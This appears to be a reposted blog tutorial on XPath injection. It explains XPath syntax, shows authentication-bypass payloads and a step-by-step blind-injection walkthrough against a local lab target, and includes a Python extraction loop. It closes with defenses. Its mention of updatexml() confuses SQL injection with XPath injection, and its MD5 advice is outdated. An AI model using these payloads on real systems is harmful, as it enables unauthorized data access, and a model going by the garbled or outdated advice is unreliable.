XPath injection attack principle and defense

0x01 What is XPath

XPath is the XML Path Language, a major element of the W3C XSLT standard. It is a language for locating a particular part of an XML document (XML being a subset of the Standard Generalized Markup Language, SGML).

XPath is based on the tree structure of XML, which contains different types of nodes, including element nodes, attribute nodes and text nodes. It provides the ability to find nodes in that tree and can be used to navigate the elements and attributes of an XML document.

0x02 XPath basic syntax

1. Basic query statement
//users/user[name/text()='abc' and password/text()='test123']
This XPath query returns the data of every user whose name is abc and whose password is test123. The user has to submit the correct name and password for a result to be returned. If an attacker enters ' or '1'='1 in the name field and ' or '1'='1 in the password field, the check is bypassed and all user data is returned:
//users/user[name/text()='' or '1'='1' and password/text()='' or '1'='1']
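How the input ends up inside the query can be sketched in a few lines of Python. This is a minimal illustration, assuming the application builds the query by plain string concatenation; the function name `build_login_query` is hypothetical, and the sketch only builds the query string without evaluating it, since Python's standard library supports only a limited subset of XPath.

```python
def build_login_query(name: str, password: str) -> str:
    """Build the login query by naive string concatenation (vulnerable)."""
    return (
        "//users/user[name/text()='" + name
        + "' and password/text()='" + password + "']"
    )


# Normal use: both values stay inside quoted string literals.
print(build_login_query("abc", "test123"))

# Injection: the single quote in the input closes the literal early,
# so the rest of the input is parsed as XPath operators and operands.
payload = "' or '1'='1"
print(build_login_query(payload, payload))
```

Because `and` binds more tightly than `or` in XPath, the injected predicate reads as A or (B and C) or D, where D is the always-true comparison '1'='1', so every user node matches.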

2. Node types
In XPath, an XML document is treated as a tree of nodes. There are seven types of nodes: element, attribute, text, namespace, processing-instruction, comment, and document nodes (also called root nodes). The root of the tree is the document node; elements are represented by element nodes and their attributes by attribute nodes.
element (element node)
attribute (attribute node)
text (text node)
namespace (namespace node)
processing-instruction (processing instruction node)
comment (comment node)
root (document node, the root of the tree)
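The node types can be made visible with Python's `xml.dom.minidom`, which labels each node in a parsed document with a type constant. This is only a rough sketch: the sample document is made up for illustration, and the DOM has no counterpart to XPath's namespace nodes, so that type does not appear.

```python
from xml.dom import Node
from xml.dom.minidom import parseString

# Hypothetical sample document, not taken from the article.
SAMPLE = (
    '<?xml-stylesheet type="text/xsl" href="style.xsl"?>'
    "<!-- user list -->"
    '<users><user id="1">abc</user></users>'
)

NODE_NAMES = {
    Node.DOCUMENT_NODE: "document (root)",
    Node.ELEMENT_NODE: "element",
    Node.ATTRIBUTE_NODE: "attribute",
    Node.TEXT_NODE: "text",
    Node.COMMENT_NODE: "comment",
    Node.PROCESSING_INSTRUCTION_NODE: "processing-instruction",
}


def node_kinds(node):
    """Return the kind of every node in document order, attributes included."""
    kinds = [NODE_NAMES[node.nodeType]]
    if node.nodeType == Node.ELEMENT_NODE:
        # Attributes are not child nodes, so they are listed separately.
        for i in range(node.attributes.length):
            kinds.append(NODE_NAMES[node.attributes.item(i).nodeType])
    for child in node.childNodes:
        kinds.extend(node_kinds(child))
    return kinds


print(node_kinds(parseString(SAMPLE)))
```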

3. Expression
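XPath selects nodes with path expressions. The basic rules:
nodename    selects the child nodes named nodename
/           selects from the root node
//          selects matching nodes anywhere below the current node, regardless of depth
.           selects the current node
..          selects the parent of the current node
@           selects attributes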
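A few basic path expressions can be tried with Python's `xml.etree.ElementTree`, which implements a limited subset of XPath. The sample document below is hypothetical and only serves to show child steps, `//`, `@` and `..` in action.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample document, not taken from the article.
root = ET.fromstring(
    "<root><users>"
    '<user id="1"><name>abc</name></user>'
    '<user id="2"><name>bob</name></user>'
    "</users></root>"
)

# Child steps, starting from the context node (here the root element).
names = [n.text for n in root.findall("./users/user/name")]

# '//' selects matching descendants at any depth.
ids = [u.get("id") for u in root.findall(".//user")]

# '@' tests an attribute inside a predicate.
second = root.find(".//user[@id='2']/name").text

# '..' steps back up to the parent of the selected node.
parent_id = root.find(".//name/..").get("id")

print(names, ids, second, parent_id)
```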

0x03 What is XPath injection attack

In recent years XML has been widely used in e-commerce and online shopping systems, and XPath injection attacks against XML data have begun to appear. Where XML is widely used, the security of its data is very important, yet few researchers currently study defenses against XPath injection.

An XPath injection attack exploits the loose input handling and fault tolerance of XPath parsers: the attacker attaches malicious XPath query code to URLs, forms, or other input in order to gain access to privileged information and change it. XPath injection is a newer attack method against Web service applications. It allows an attacker to obtain the complete content of an XML document through XPath queries without prior knowledge of the XPath query in use.

0x04 XPath injection attack features

XPath injection attacks use two techniques: XPath scanning and Booleanization of XPath queries. Through this attack, the attacker can control the XML database used for XPath queries. The attack is effective wherever XPath queries (and XML databases) are used for authentication, lookups or other operations. XPath injection is similar to SQL injection, but from the attacker's point of view it has advantages in the following respects.

(1) Universality. XPath injection uses XPath syntax. Because XPath is a standard language, any Web application that builds XPath queries without strictly processing its input is open to XPath injection. The weakness does not depend on the implementation, which is very different from SQL injection, where the attack may have to be adapted to the SQL dialect the database supports.

(2) Severity. The XPath language can reference almost every part of an XML document, and such references generally have no access control restrictions. In SQL injection, by contrast, the rights of a "user" may be limited to specific tables, columns or queries, whereas an XPath injection attack can in principle obtain the complete XML document, that is, the complete database. As long as a Web service application has this basic vulnerability, automated attacks against its XPath queries can be constructed.

0x05 Hazard of XPath injection

  1. Malicious XPath code submitted in URLs and forms can be used to gain access to restricted data and to modify it.
  2. The complete XML content of the system can be obtained by querying through this type of vulnerability.
  3. Logic and authentication are bypassed. Unlike a database, XML has no concept of permissions, so a user who can shape the XPath query can read the entire document.
  4. Verification is bypassed and information is leaked.

0x06 XPath injection attack principle

The principle of XPath injection is very similar to that of SQL injection. The attack works by constructing special inputs, usually fragments of XPath syntax. These inputs are passed to the Web application as parameters, and when the application executes its XPath query they carry out the operation the intruder wants. The target, however, is not a database users table but an XML file that stores the data.

The attacker can learn the structure of the XML data or access data that would normally be off limits. If the XML data is used for user authentication, the attacker can elevate their privileges. Because XPath has no access control, the attacker does not run into the access restrictions that are common in SQL injection: XML has no access control or user authentication of its own. If a user is able to issue XPath queries and there is no defense in between, or the defense does not filter the query, that user can access the entire XML document.

A common example is //users/user[username/text()='' or '1' or '1' and password/text()=''].
This string makes the query always evaluate to true, so the attacker is always let into the system. Attackers can use XPath to dynamically manipulate XML documents in applications. Once the attack succeeds, blind XPath injection can be used to obtain the highest-privilege account and other important document information. Beyond this there are many more XPath injection tricks, such as error-based injection through the updatexml() function and blind XPath injection.

Blog.xml (stores the user names and passwords)
[Figure: contents of Blog.xml]
Index.php (receives the incoming parameters and runs the XML query)
[Figure: source of Index.php]
The code is very simple and implements a basic login check. As with SQL injection, the data entered by the user is not filtered, so the attacker can inject an XPath expression directly.

0x07 XPath blind injection method

Blind XPath injection mainly relies on XPath's string functions and operators. The steps below use count(), name(), position() and substring().

Taking the environment above as an example, the query is built as follows:
$query = "/root/users/user[username/text()='".$name."' and password/text()='".$pwd."']";
To traverse the entire XML document, the general steps are:
1. Use count(/*) to determine the number of root nodes:
http://127.0.0.1/xpath/index.php?name=' or count(/*)=1 or '1'='2
Result: 1
If a result is returned, there is a single root node.

2. Use substring to test the name of the root node one character at a time and guess the first-level node:
http://127.0.0.1/xpath/index.php?name=' or substring(name(/*[position()=1]),1,1)='r' or '1'='2
http://127.0.0.1/xpath/index.php?name=' or substring(name(/*[position()=1]),2,1)='o' or '1'='2

Result: root

3. Determine the number of root's next-level nodes:
http://127.0.0.1/xpath/index.php?name=' or count(/root/*)=2 or '1'='2
Result: 1

4. Guess the next node of root:
http://127.0.0.1/xpath/index.php?name=' or substring(name(/root/*[position()=1]),1,1)='u' or '1'='2
http://127.0.0.1/xpath/index.php?name=' or substring(name(/root/*[position()=2]),1,1)='s' or '1'='2
Result: users

5. Repeat the steps above until all nodes have been guessed, and finally guess the data or attribute values in the nodes.
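The character-by-character guessing in these steps lends itself to automation. The following Python sketch shows the loop under stated assumptions: `ask` is a hypothetical callback that would send one payload in the name parameter and report whether the page returned a result, and `fake_oracle` is a local stand-in so the loop can be run without a target. All function names are illustrative.

```python
import re
import string


def name_probe(path: str, index: int, char: str) -> str:
    """Payload that is true only if character `index` of name(path) is `char`."""
    return f"' or substring(name({path}),{index},1)='{char}' or '1'='2"


def recover_name(ask, path, alphabet=string.ascii_lowercase, max_len=32):
    """Recover a node name one character at a time through a yes/no oracle."""
    found = ""
    for index in range(1, max_len + 1):
        for char in alphabet:
            if ask(name_probe(path, index, char)):
                found += char
                break
        else:
            # No candidate matched: we are past the end of the name.
            break
    return found


def fake_oracle(secret: str):
    """Stand-in for the HTTP request: answers probes about one fixed name."""
    pattern = re.compile(r",(\d+),1\)='(.)'")

    def ask(payload: str) -> bool:
        index, char = pattern.search(payload).groups()
        return secret[int(index) - 1:int(index)] == char

    return ask


print(recover_name(fake_oracle("root"), "/*[position()=1]"))
```

Each probe costs one request per candidate character, which is why real tools usually narrow the alphabet or probe the name length first.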

0x08 XPath injection attack defense technology

(1) Validate submitted data on the server side, before the server formally processes it.
(2) Check whether the submitted data contains special characters; encode or replace those characters, and delete sensitive characters or strings.
(3) Replace the error messages the system produces with generic error-code pages, such as the ones IE displays, so that the system's own error details are hidden.
(4) Use parameterized XPath queries: the parts of the query that depend on input are expressed as variables, and a variable is data, not script that can be executed. The following code parameterizes the query by keeping it in an external file:
declare variable $loginID as xs:string external;
declare variable $password as xs:string external;
//users/user[@loginID=$loginID and @password=$password]
(5) Use cryptography for sensitive data and for data in transit, for example hashing with MD5 and transport encryption with SSL, so that even if an attacker captures packets by illegitimate means, all they see is protected information.
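Measures (1) and (2) can be sketched in Python as follows. This is a minimal illustration, not a complete defense: the allowed character set and length limit are assumptions, and both function names are hypothetical. Where the XPath library in use offers variable binding as in measure (4), that remains the preferable route.

```python
import re

# Assumed policy: user names are 1-32 letters, digits, '_' or '-'.
USERNAME_RE = re.compile(r"[A-Za-z0-9_-]{1,32}")


def is_valid_username(value: str) -> bool:
    """Whitelist check: accept only characters with no meaning in XPath."""
    return USERNAME_RE.fullmatch(value) is not None


def xpath_literal(value: str) -> str:
    """Quote an arbitrary string as an XPath 1.0 string literal."""
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    # Both quote types present: XPath 1.0 has no escape character,
    # so join single-quoted pieces with a double-quoted apostrophe.
    parts = value.split("'")
    return "concat(" + ", \"'\", ".join("'" + p + "'" for p in parts) + ")"


print(is_valid_username("abc"))          # accepted by the whitelist
print(is_valid_username("' or '1'='1"))  # rejected by the whitelist
print(xpath_literal("' or '1'='1"))      # stays a single string literal
```

Rejecting input with the whitelist is the stricter option; quoting is the fallback for fields such as passwords, where arbitrary characters have to be allowed.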

Origin blog.csdn.net/m0_38103658/article/details/105481323